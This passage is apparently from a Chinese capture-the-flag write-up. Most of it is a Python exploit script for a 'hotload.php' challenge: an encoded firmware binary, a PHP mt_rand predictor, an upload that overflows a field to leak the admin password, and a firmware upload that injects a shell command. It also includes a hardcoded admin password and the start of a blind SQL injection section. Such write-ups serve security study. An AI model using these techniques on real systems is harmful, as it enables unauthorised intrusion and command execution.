AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByAAAAAAAAAGFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWEAAAAAARsDOyAAAAADAAAAFO///zwAAABk7///ZAAAACnw//98AAAAFAAAAAAAAAABelIAAXgQARsMBwiQAQAAJAAAABwAAADQ7v//UAAAAAAOEEYOGEoPC3cIgAA/GjsqMyQiAAAAABQAAABEAAAA+O7//wgAAAAAAAAAAAAAABwAAABcAAAApe///3YAAAAAQQ4QhgJDDQYCcQwHCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADARAAAAAAAAAAAAAAAAAADwEAAAAAAAAAEAAAAAAAAAfAAAAAAAAAAMAAAAAAAAAAAQAAAAAAAADQAAAAAAAACsEQAAAAAAABkAAAAAAAAAAD4AAAAAAAAbAAAAAAAAABAAAAAAAAAAGgAAAAAAAAAQPgAAAAAAABwAAAAAAAAACAAAAAAAAAD1/v9vAAAAAGACAAAAAAAABQAAAAAAAACwAwAAAAAAAAYAAAAAAAAAkAIAAAAAAAAKAAAAAAAAAJIAAAAAAAAACwAAAAAAAAAYAAAAAAAAAAMAAAAAAAAAAEAAAAAAAAACAAAAAAAAAGAAAAAAAAAAFAAAAAAAAAAHAAAAAAAAABcAAAAAAAAAcAUAAAAAAAAHAAAAAAAAAIAEAAAAAAAACAAAAAAAAADwAAAAAAAAAAkAAAAAAAAAGAAAAAAAAAD+//9vAAAAAGAEAAAAAAAA////bwAAAAABAAAAAAAAAPD//28AAAAAQgQAAAAAAAD5//9vAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGD4AAAAAAAAAAAAAAAAAAAAAAAAAAAAANhAAAAAAAABGEAAAAAAAAFYQAAAAAAAAZhAAAAAAAAA4QAAAAAAAAAAAAAAAAAAAR0NDOiAoRGViaWFuIDguMy4wLTYpIDguMy4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABADgCAAAAAAAAAAAAAAAAAAAAAAAAAwACAGACAAAAAAAAAAAAAAAAAAAAAAAAAwADAJACAAAAAAAAAAAAAAAAAAAAAAAAAwAEALADAAAAAAAAAAAAAAAAAAAAAAAAAwAFAEIEAAAAAAAAAAAAAAAAAAAAAAAAAwAGAGAEAAAAAAAAAAAAAAAAAAAAAAAAAwAHAIAEAAAAAAAAAAAAAAAAAAAAAAAAAwAIAHAFAAAAAAAAAAAAAAAAAAAAAAAAAwAJAAAQAAAAAAAAAAAAAAAAAAAAAAAAAwAKACAQAAAAAAAAAAAAAAAAAAAAAAAAAwALAHAQAAAAAAAAAAAAAAAAAAAAAAAAAwAMAIAQAAAAAAAAAAAAAAAAAAAAAAAAAwANAKwRAAAAAAAAAAAAAAAAAAAAAAAAAwAOAAAgAAAAAAAAAAAAAAAAAAAAAAAAAwAPAAwhAAAAAAAAAAAAAAAAAAAAAAAAAwAQADAhAAAAAAAAAAAAAAAAAAAAAAAAAwARAAA+AAAAAAAAAAAAAAAAAAAAAAAAAwASABA+AAAAAAAAAAAAAAAAAAAAAAAAAwATABg+AAAAAAAAAAAAAAAAAAAAAAAAAwAUANg/AAAAAAAAAAAAAAAAAAAAAAAAAwAVAABAAAAAAAAAAAAAAAAAAAAAAAAAAwAWADhAAAAAAAAAAAAAAAAAAAAAAAAAAwAXAGBAAAAAAAAAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAAAMAAAAAgAMAIAQAAAAAAAAAAAAAAAAAAAOAAAAAgAMALAQAAAAAAAAAAAAAAAAAAAhAAAAAgAMAPAQAAAAAAAAAAAAAAAAAAA3AAAAAQAXAGBAAAAAAAAAAQAAAAAAAABGAAAAAQASABA+AAAAAAAAAAAAAAAAAABtAAAAAgAMADARAAAAAAAAAAAAAAAAAAB5AAAAAQARAAA+AAAAAAAAAAAAAAAAAACYAAAABADx/wAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAACjAAAAAQAQAKghAAAAAAAAAAAAAAAAAAAAAAAABADx/wAAAAAAAAAAAAAAAAAAAACxAAAAAgANAKwRAAAAAAAAAAAAAAAAAAC3AAAAAQAWADhAAAAAAAAAAAAAAAAAAADEAAAAAQATABg+AAAAAAAAAAAAAAAAAADNAAAAAAAPAAwhAAAAAAAAAAAAAAAAAADgAAAAAQAWAEhAAAAAAAAAAAAAAAAAAADsAAAAAQAVAABAAAAAAAAAAAAAAAAAAAACAQAAAgAJAAAQAAAAAAAAAAAAAAAAAAAIAQAAIAAAAAAAAAAAAAAAAAAAAAAAAAAkAQAAEgAAAAAAAAAAAAAAAAAAAAAAAAA3AQAAEgAMADURAAAAAAAAdgAAAAAAAAA7AQAAEgAAAAAAAAAAAAAAAAAAAAAAAABPAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABjAQAAIAAAAAAAAAAAAAAAAAAAAAAAAACGAQAAEQAWAEBAAAAAAAAACAAAAAAAAAByAQAAEgAAAAAAAAAAAAAAAAAAAAAAAACFAQAAEQAXAIBAAAAAAAAAMAEAAAAAAACOAQAAIAAAAAAAAAAAAAAAAAAAAAAAAACoAQAAIgAAAAAAAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjczMjUAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AGZpcm13YXJlLmMAX19GUkFNRV9FTkRfXwBfZmluaQBfX2Rzb19oYW5kbGUAX0RZTkFNSUMAX19HTlVfRUhfRlJBTUVfSERSAF9fVE1DX0VORF9fAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfaW5pdABfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAZnJlYWRAQEdMSUJDXzIuMi41AGZ1bgBwY2xvc2VAQEdMSUJDXzIuMi41AG1lbXNldEBAR0xJQkNfMi4yLjUAX19nbW9uX3N0YXJ0X18AcG9wZW5AQEdMSUJDXzIuMi41AF92ZXJzaW9uAF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemVAQEdMSUJDXzIuMi41AAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5ub3RlLmdudS5idWlsZC1pZAAuZ251Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsYS5keW4ALnJlbGEucGx0AC5pbml0AC5wbHQuZ290AC50ZXh0AC5maW5pAC5yb2RhdGEALmVoX2ZyYW1lX2hkcgAuZWhfZnJhbWUALmluaXRfYXJyYXkALmZpbmlfYXJyYXkALmR5bmFtaWMALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAcAAAACAAAAAAAAADgCAAAAAAAAOAIAAAAAAAAkAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAC4AAAD2//9vAgAAAAAAAABgAgAAAAAAAGACAAAAAAAAMAAAAAAAAAADAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAA4AAAACwAAAAIAAAAAAAAAkAIAAAAAAACQAgAAAAAAACABAAAAAAAABAAAAAEAAAAIAAAAAAAAABgAAAAAAAAAQAAAAAMAAAACAAAAAAAAALADAAAAAAAAsAMAAAAAAACSAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAEgAAAD///9vAgAAAAAAAABCBAAAAAAAAEIEAAAAAAAAGAAAAAAAAAADAAAAAAAAAAIAAAAAAAAAAgAAAAAAAABVAAAA/v//bwIAAAAAAAAAYAQAAAAAAABgBAAAAAAAACAAAAAAAAAABAAAAAEAAAAIAAAAAAAAAAAAAAAAAAAAZAAAAAQAAAACAAAAAAAAAIAEAAAAAAAAgAQAAAAAAADwAAAAAAAAAAMAAAAAAAAACAAAAAAAAAAYAAAAAAAAAG4AAAAEAAAAQgAAAAAAAABwBQAAAAAAAHAFAAAAAAAAYAAAAAAAAAADAAAAFQAAAAgAAAAAAAAAGAAAAAAAAAB4AAAAAQAAAAYAAAAAAAAAABAAAAAAAAAAEAAAAAAAABcAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAcwAAAAEAAAAGAAAAAAAAACAQAAAAAAAAIBAAAAAAAABQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAH4AAAABAAAABgAAAAAAAABwEAAAAAAAAHAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAACHAAAAAQAAAAYAAAAAAAAAgBAAAAAAAACAEAAAAAAAACsBAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAjQAAAAEAAAAGAAAAAAAAAKwRAAAAAAAArBEAAAAAAAAJAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAJMAAAABAAAAAgAAAAAAAAAAIAAAAAAAAAAgAAAAAAAACQEAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACbAAAAAQAAAAIAAAAAAAAADCEAAAAAAAAMIQAAAAAAACQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAqQAAAAEAAAACAAAAAAAAADAhAAAAAAAAMCEAAAAAAAB8AAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAALMAAAAOAAAAAwAAAAAAAAAAPgAAAAAAAAAuAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAAC/AAAADwAAAAMAAAAAAAAAED4AAAAAAAAQLgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAywAAAAYAAAADAAAAAAAAABg+AAAAAAAAGC4AAAAAAADAAQAAAAAAAAQAAAAAAAAACAAAAAAAAAAQAAAAAAAAAIIAAAABAAAAAwAAAAAAAADYPwAAAAAAANgvAAAAAAAAKAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADUAAAAAQAAAAMAAAAAAAAAAEAAAAAAAAAAMAAAAAAAADgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA3QAAAAEAAAADAAAAAAAAADhAAAAAAAAAODAAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAOMAAAAIAAAAAwAAAAAAAABgQAAAAAAAAEgwAAAAAAAAUAEAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAADoAAAAAQAAADAAAAAAAAAAAAAAAAAAAABIMAAAAAAAABwAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAaDAAAAAAAAAoBQAAAAAAABoAAAAsAAAACAAAAAAAAAAYAAAAAAAAAAkAAAADAAAAAAAAAAAAAAAAAAAAAAAAAJA1AAAAAAAAxAEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAARAAAAAwAAAAAAAAAAAAAAAAAAAAAAAABUNwAAAAAAAPEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA')
class php_rand():
MT_RAND_MT19937 = 0
MT_RAND_PHP = 1
php_N = 624
php_M = 397
php_left = 0
php_next = 0
php_state = [0] * (php_N + 1)
php_mode = 0
def __init__(self, seed, mode=0):
self.php_mt_srand(seed)
self.php_mode = mode
def seed(self, seed):
self.php_mt_srand(seed)
def rand(self):
return self.php_mt_rand()
def hiBit(self, u):
return u & 0x80000000
def loBit(self, u):
return u & 0x00000001
def loBits(self, u):
return u & 0x7FFFFFFF
def mixBits(self, u, v):
return self.hiBit(u) | self.loBits(v)
def twist(self, m, u, v):
return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(v)) & 0x9908b0df)
def twist_php(self, m, u, v):
return m ^ (self.mixBits(u, v) >> 1) ^ ((-self.loBit(u)) & 0x9908b0df)
def php_mt_initialize(self, seed):
state = self.php_state
N = self.php_N
state[0] = seed & 0xffffffff
for i in range(1, N):
state[i] = (1812433253 * (state[i - 1] ^ (state[i - 1] >> 30)) + i) & 0xffffffff
self.php_state = state
def php_mt_reload(self):
self.php_left = 0
state = self.php_state
N = self.php_N
M = self.php_M
p = 0
i = N - M
if self.php_mode == self.MT_RAND_MT19937:
while i > 0:
i -= 1
state[p] = self.twist(state[p + M],state[p + 0],state[p + 1])
p += 1
i = M - 1
while i > 0:
state[p] = self.twist(state[p+M-N],state[p + 0],state[p + 1])
p += 1
i -= 1
state[p] = self.twist(state[p + M - N],state[p + 0],state[0])
else:
while i > 0:
i -= 1
state[p] = self.twist_php(state[p + M],state[p + 0],state[p + 1])
p += 1
i = M - 1
while i > 0:
state[p] = self.twist_php(state[p + M - N],state[p + 0],state[p + 1])
p += 1
i -= 1
state[p] = self.twist_php(state[p + M - N],state[p + 0],state[0])
self.php_left = N
self.php_next = 0
self.php_state = state
def php_mt_srand(self, seed):
self.php_mt_initialize(seed)
self.php_mt_reload()
def php_mt_rand(self):
if self.php_left == 0: self.php_mt_reload()
self.php_left -= 1
s1 = self.php_state[self.php_next]
s1 ^= (s1 >> 11)
s1 ^= (s1 << 7) & 0x9d2c5680
s1 ^= (s1 << 15) & 0xefc60000
self.php_next += 1
return ( s1 ^ (s1 >> 18)) >> 1
# get random string
def rand_str(length=8):
return ''.join(random.sample(string.ascii_letters + string.digits, length))
# get method
def get(session, url):
retry = 0
while True:
retry += 1
try:
if session:
r = s.get(url, timeout=timeout)
else:
r = requests.get(url, timeout=timeout)
except:
if retry >= retry_count:
print('timeout or http 500')
exit()
continue
break
return r
# post method
def post(session, url, data, files=''):
retry = 0
while True:
retry += 1
try:
if session:
if files=='':
r = s.post(url, data=data, timeout=timeout)
else:
r = s.post(url, data=data, files=files, timeout=timeout)
else:
if files=='':
r = requests.post(url, data=data, timeout=timeout)
else:
r = requests.post(url, data=data, files=files, timeout=timeout)
except:
if retry >= retry_count:
print('timeout or http 500')
exit()
continue
break
return r
# login with username and password
def login(username, password):
url = site_url + '/hotload.php?page=login'
data = {'username': username, 'password': password}
if logging: print(url)
if logging: print(data)
res = post(1, url, data)
if logging: print(res.text)
url = site_url + '/hotload.php?page=upload'
res = get(1, url)
if 'fileuploaded' not in res.text:
return False
return True
# reg with username and password
def reg(username, password):
url = site_url + '/hotload.php?page=reg'
if logging: print(url)
res = get(1, url)
show_code = ''
show_calc = ''
try:
show_code = res.text.split('show_code">')[1].split('<')[0]
show_calc = res.text.split('show_calc">')[1].split('<')[0]
if logging: print(len(show_calc))
if len(show_calc) != 6:
print('invalid show_calc length')
return False
except:
return False
if logging: print("show_code",show_code)
if logging: print("show_calc",show_calc)
code = ''
for i in range(1, 100000000):
code = str(i)
if hashlib.md5(code + show_code).hexdigest()[:6] == show_calc.lower(): break
data = {'username': username, 'password1': password, 'password2': password, 'code': code}
if logging: print(data)
res = post(1, url, data)
if logging: print(res.text)
if '"status":1' in res.text:
return True
return False
# upload music [diff]
def upload_music():
url = site_url + '/hotload.php?page=upload'
data = {'file_id': '0'}
music = preset_music[:0x6] + '\x00\x00\x03\x00' + preset_music[0x0a:0x53]
music += '\x00\x00\x03\x00' + '\x00\x00\x03' + 'a' * 0x70 + '\x00'
files = {'file_data': music}
if logging: print(url)
if logging: print(data)
res = post(1, url, data, files)
if logging: print(res.text)
if '"status":1' in res.text:
try:
# n54LuyJyYLVpVO2w
return b64decode(json.loads(res.content.strip())['artist'])[:16]
except:
return ''
return ''
# upload firmware [diff]
def upload_firmware(command):
if len(command) > 0x100: return -1
url = site_url + '/hotload.php?page=firmware'
data = {'file_id': '0'}
command = command.ljust(0x100, '\x00')
firmware = preset_firmare.replace('a' * 0x100, command)
files = {'file_data': firmware}
if logging: print(url)
if logging: print(data)
res = post(1, url, data, files)
if logging: print("Upload: " + res.text)
if '"status":1' in res.text:
if 'Date' in res.headers.keys():
print("Date Header: " + res.headers['Date'])
return int(datetime.strptime(res.headers['Date'], "%a, %d %b %Y %X %Z").strftime("%s")) + time_zone_offset
else:
return int(time.time())
return -1
# get firmware version
def firmware_version(path):
if len(path)>0x40: return ''
url = site_url + '/hotload.php?page=firmware'
data = {'path': path}
if logging: print(url)
if logging: print(data)
res = post(1, url, data)
if logging: print(res.text)
if '"status":1' in res.text:
try:
return json.loads(res.content.strip())['info']
except:
return ''
return ''
# show result
def show_result(vuln1, vuln2, msg):
result = ''
if vuln1 == -1:
result += 'Vuln 1 check: unknown.\n'
elif vuln1 == 0:
result += 'Vuln 1 check: fail.\n'
else:
result += 'Vuln 1 check: pass.\n'
if vuln2 == -1:
result += 'Vuln 2 check: unknown.\n'
elif vuln2 == 0:
result += 'Vuln 2 check: fail.\n'
else:
result += 'Vuln 2 check: pass.\n'
result += msg
print(result)
exit()
# get flag
def get_flag():
path = 0
vuln1 = -1
vuln2 = -1
logined = -1
if path == 0:
# username = '1Bq2DT3j'
# password = 'KWRpkXgHnb'
# # res = reg(username, password)
# # if not res: show_result(vuln1, vuln2, 'register fail')
# res = login(username, password)
# if not res: show_result(vuln1, vuln2, 'login fail')
# time.sleep(3)
# res = upload_music()
# if res == '':
# vuln1 = 0
# show_result(vuln1, vuln2, 'leak admin password fail')
admin_password = 'Mike84eiNxHcMVCz'
global s
s = requests.session()
res = login('admin', admin_password)
if not res:
vuln1 = 0
show_result(vuln1, vuln2, 'leak wrong admin password')
vuln1 = 1
time.sleep(3)
guess_server_time = upload_firmware(command)
print(guess_server_time)
if guess_server_time == -1:
show_result(vuln1, vuln2, 'upload fail')
vuln2 = 0
succ_keyword = '固件版本號:'
if vuln2 == 0:
for i in range(5):
rander = php_rand(guess_server_time - i)
path = hashlib.md5(str(rander.rand()) + '[公網(wǎng)ip地址]').hexdigest()
try:
prev_flag = firmware_version(path).encode('utf-8')
except:
continue
if succ_keyword in prev_flag:
vuln2 = 1
prev_flag = prev_flag.replace(succ_keyword, '').strip()
break
show_result(vuln1, vuln2, prev_flag)
if __name__ == '__main__':
if len(argv) != 3:
print("wrong params.")
print("example: python %s %s %s" % (argv[0], '127.0.0.1', '80'))
exit()
ip = argv[1]
port = int(argv[2])
site_url = 'http://%s:%d' % (ip, port)
get_flag()
有個小細節(jié)望侈,vps需要用對應(yīng)時區(qū)的地區(qū)的vps印蔬,不然會有時間差......別問我怎么知道的.
0x04 Giftbox
第一層考點:login處盲注
大前提,有個時間校驗脱衙,需要系統(tǒng)為北京時間侥猬,直接設(shè)定時區(qū)為北京時區(qū)比較方便。
查看view-source:http://222.85.25.41:8090/js/知道pyotp.zip和>totp.min.js是采用了雙因子認證
在此處得到關(guān)于雙因子認證的信息view-source:http://222.85.25.41:8090/js/main.js
